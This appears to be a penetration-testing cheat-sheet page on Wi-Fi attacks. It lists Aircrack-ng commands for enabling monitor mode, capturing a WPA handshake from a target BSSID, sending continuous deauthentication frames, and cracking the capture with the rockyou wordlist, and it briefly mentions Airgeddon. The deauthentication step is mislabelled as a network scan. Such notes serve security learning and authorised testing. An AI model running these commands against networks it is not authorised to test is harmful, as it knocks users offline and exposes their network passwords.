CyberNotes
Wi Fi/Wireless Attacks

Aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Capturing wireless handshakes

Commonly used Aircrack-ng tools and commands to capture a wireless handshake

Airmon-ng

Enable and disable monitor mode on wireless interfaces

  1. Kill active processess
sudo airmon-ng check kill
  1. Put wireless card into monitor mode
sudo airmon-ng start wlan0
Turn off monitor mode
sudo airmon-ng stop wlan0mon

Airodump-ng

Capture raw 802.11 frames

  1. Scan for wireless networks
Sudo airodump-ng wlan0mon
  • 'ctrl c' to break
  • Save MAC address, channel, name, etc...
Filter to display target network
Sudo airodump-ng wlan0mon -d <MAC_Address>
  1. Receive and store captures
sudo airodump-ng -w filename -c 2 --bssid 00:11:AB:CD:E5:F8 wlan0mon

Aireplay-ng

Inject and replay wireless frames

** Open a new terminal for the following command **

  1. Scan for wireless networks
sudo aireplay-ng --deauth 0 -a 00:11:AB:CD:E5:F8 wlan0mon
  1. Try a simple crack
aircrack-ng filename-01.cap -w /usr/share/wordlists/rockyou.txt

Resources

RFI

Remote File Inclusion

Airgeddon

Airgeddon is a multi-use bash script for Linux systems designed to audit wireless networks. It can perform various types of wireless attacks, including DoS attacks, WPS attacks, and WEP attacks.

On this page